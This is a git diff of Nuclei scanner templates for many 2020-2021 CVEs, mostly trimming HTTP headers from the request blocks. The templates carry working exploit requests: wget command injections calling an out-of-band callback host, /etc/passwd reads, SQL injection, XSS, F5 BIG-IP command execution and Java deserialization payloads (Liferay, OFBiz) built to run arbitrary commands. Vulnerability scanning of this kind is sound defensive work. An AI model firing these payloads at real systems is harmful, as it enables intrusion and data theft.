Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a4d926f2a5..e511013c53 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -16,17 +16,10 @@ requests: - | GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive + - | GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index eb7d3e6d13..e320eb589c 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -14,10 +14,7 @@ requests: POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - X-Requested-With: XMLHttpRequest Content-Type: application/json - User-Agent: Ophion SecurityGroup - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"} diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index d65d7e96c6..a5e9540ba2 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -13,12 +13,9 @@ requests: - | POST /goform/setSysAdm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/login.shtml + Origin: {{BaseURL}} + Referer: {{BaseURL}}/login.shtml admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index cf3a2d1395..af6da1dcfa 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -17,7 +17,6 @@ requests: POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Content-Length: 44 SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index 8f6e44259c..835ccc29ed 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml @@ -14,30 +14,16 @@ requests: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 269 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 - Accept: */* - Accept-Language: en-US,en;q=0.9 - Connection: close + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 Content-Disposition: form-data; name="action" @@ -52,11 +38,6 @@ requests: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close extractors: - type: regex diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index f5a620db25..def510535d 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -15,14 +15,6 @@ requests: - | GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - DNT: 1 - Connection: close - Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n - Upgrade-Insecure-Requests: 1 matchers: - type: word diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 2ab9a084ee..6107fbb57a 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -15,8 +15,6 @@ requests: POST /dfsms/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Connection: close - Content-Length: 66 username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index 54c13f3586..e55a8ef228 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -26,11 +26,13 @@ requests: - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license" - "{{BaseURL}}/hsqldb%0a" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" @@ -38,41 +40,35 @@ requests: - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" - "HSQL Database Engine Servlet" condition: or - part: body + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=create%20cli%20alias%20private%20list%20command%20bash - | POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=list%20%2Ftmp%2Fnonexistent - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=delete%20cli%20alias%20private%20list + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "h3ll0_w0Rld" diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 70fc14a6ca..1ca340cabb 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -14,9 +14,6 @@ requests: - | GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* matchers: - type: word diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 09cee1e759..d88be8f1b8 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -15,14 +15,8 @@ requests: - | POST /api/jsonws/invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Content-Length: 4938 - Accept: */* - Accept-Language: en - Connection: close Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData - X-Requested-With: XMLHttpRequest cmd2: §command§ cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D @@ -39,8 +33,7 @@ requests: regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" - condition: or - part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 4a7f5a15fd..653c89b7d0 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -14,23 +14,18 @@ requests: - | POST /menu/stapp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-NITRO-USER: xpyZxwy6 sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot + matchers-condition: and matchers: - type: word words: - "" part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index 3ff654e589..b63ac93a82 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml @@ -15,7 +15,6 @@ requests: - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml X-NITRO-USER: xpyZxwy6 X-NITRO-PASS: xWXHUJ56 @@ -25,30 +24,18 @@ requests: - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 @@ -59,9 +46,6 @@ requests: - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 @@ -70,20 +54,14 @@ requests: cookie-reuse: true - - # Using cookie-reuse to maintain session between each request, same as browser. - extractors: - type: regex - name: randkey + name: randkey # dynamic variable part: body internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - # Using rand_key as dynamic variable to make use of extractors at run time. - - matchers: - type: regex regex: diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml index 874d9e5856..1c08f85a0f 100644 --- a/cves/2020/CVE-2020-8194.yaml +++ b/cves/2020/CVE-2020-8194.yaml @@ -5,23 +5,15 @@ info: author: dwisiswant0 severity: high tags: cve,cve2020,citrix - description: | - Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. - reference: - - https://support.citrix.com/article/CTX276688 + description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. + reference: https://support.citrix.com/article/CTX276688 requests: - raw: - | GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close Cookie: startupapp=st - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: @@ -29,10 +21,12 @@ requests: words: - "" part: body + - type: word words: - "application/x-java-jnlp-file" part: header + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index 0b7f3c8ed7..da3aec26dd 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -15,9 +15,6 @@ requests: - | POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: */* - Connection: close action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index e5a9eb428d..0a036e89a5 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -14,10 +14,6 @@ requests: - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} matchers: diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml index db8408c9f2..f244463bf9 100644 --- a/cves/2020/CVE-2020-9315.yaml +++ b/cves/2020/CVE-2020-9315.yaml @@ -12,8 +12,6 @@ requests: path: - "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2" - "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 217ef7fa40..35aef60dbd 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -21,9 +21,7 @@ requests: - | POST /storfs-asup HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Content-Length: 78 Content-Type: application/x-www-form-urlencoded action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}` diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index 6b175dab6d..a419448255 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -24,11 +24,7 @@ requests: Host: {{Hostname}} Cookie: lang=8; url=ping.html; mobile=false; Referer: {{BaseURL}}/info.html - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 178 matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index cdd020bddc..83f46804d2 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -16,24 +16,13 @@ requests: - | POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 8 imgSrc=a - | POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - Content-Length: 790 imgSrc= @@ -62,13 +51,11 @@ requests: + - | POST /lucee/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded cmd=id&opts=&timeout=5 diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index 7aecfc64a1..adec07c32f 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -18,7 +18,6 @@ requests: - | POST /wp-json/buddypress/v1/signup HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/json; charset=UTF-8 { diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml index 92ba471ccb..e7337d9775 100644 --- a/cves/2021/CVE-2021-21975.yaml +++ b/cves/2021/CVE-2021-21975.yaml @@ -14,7 +14,6 @@ requests: POST /casa/nodes/thumbprints HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ["127.0.0.1:443/ui/"] diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index aa4c7001a1..ad807159dc 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -19,8 +19,6 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/json - Content-Length: 86 - Connection: close {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index 51523e26ab..b4e407b056 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -16,10 +16,8 @@ requests: - | POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Referer: {{BaseURL}} content-type: application/json - Connection: close {"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"} diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 8f67d63102..7fb471bc6f 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -17,7 +17,6 @@ requests: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 47 action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- - diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml index 40bbfa226a..9b24744f57 100644 --- a/cves/2021/CVE-2021-25281.yaml +++ b/cves/2021/CVE-2021-25281.yaml @@ -13,13 +13,7 @@ requests: - | POST /run HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json - Content-Length: 173 - Connection: close {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 23c3e6d3dc..ca62a13683 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -15,10 +15,7 @@ requests: - | POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json - Content-Length: 1006 - Connection: close { "type":"index", diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 3044206eb1..cef67180f6 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -19,42 +19,38 @@ requests: - | POST /webtools/control/SOAPService HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 - Connection: close Content-Type: application/xml - Content-Length: 910 - - - - - - - - bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a - - - - - - - - + + + + + + + + bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a + + + + + + + + - matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "OFBiz.Visitor=" part: header + - type: word words: - "deserializing" diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index 09c5027755..cba085815d 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -16,18 +16,11 @@ requests: GET /assets/app/something/services/AppModule.class/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: 